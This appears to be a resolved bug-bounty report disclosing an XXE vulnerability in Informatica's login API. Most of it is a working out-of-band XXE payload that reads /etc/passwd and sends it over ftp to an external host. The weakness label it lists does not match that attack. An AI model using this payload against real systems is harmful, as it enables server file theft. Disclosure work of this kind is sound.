[app.informaticaondemand.com] XXE
High
I
Informatica
Submitted None
Actions:
Reported by
yarbabin
Vulnerability Details
Technical details and impact analysis
Request:
POST /ma/api/v2/user/login HTTP/1.1
Host: app.informaticaondemand.com
Content-Length: 285
Content-Type: application/xml
Accept: application/xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [
<!ENTITY % b PUBLIC "lol" "file:///etc/passwd">
<!ENTITY % asd PUBLIC "lol" "http://mysite/xx.html">
%asd;
%rrr;]>
<login><username>[email protected]</username><password>Infa123</password></login>
Where xx.html:
<!ENTITY % c "<!ENTITY % rrr SYSTEM 'ftp://mysite/%b;'>">%c;
Then i got file /etc/passwd (xxe_app.png)
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Uncontrolled Resource Consumption